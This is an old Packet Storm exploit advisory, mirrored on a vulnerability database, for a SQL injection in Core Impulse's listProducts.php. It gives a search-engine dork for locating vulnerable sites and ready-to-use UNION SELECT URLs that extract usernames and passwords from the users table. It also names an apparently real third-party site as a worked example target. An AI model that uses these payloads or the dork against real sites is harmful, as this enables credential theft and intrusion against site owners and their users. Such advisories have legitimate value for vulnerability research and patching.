Lucene search

K

core-sql.txt

🗓️ 28 Apr 2008 00:00:00Reported by e.wiZz!Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 40 Views

Core Impulse SQL Injection vulnerability found at www.coreimpulse.co

Show more
Code
`Core Impulse SQL Injection vulnerability  
******************************  
Vendor site: www.coreimpulse.com   
discovered by: e.wiZz!  
Dork: inurl:/products/listProducts.php?cat or inurl:listProducts.php?cat  
  
Exploit:  
  
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/  
  
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/  
  
Example:  
  
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/*http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/  
  
My blog: infected.blogger.ba  
  
visit: 50centshost.com/forum  
Info:bezveze ovo al et,osjecam se kao noob :D  
  
Thanks 2: big thanks to my friend aluigi(aluigi.freeforums.org),QKrunix,F34r...nekako su mi zanimljivi,hvala i skillpak3ru sto me nasmijava svojim znanjem :D  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo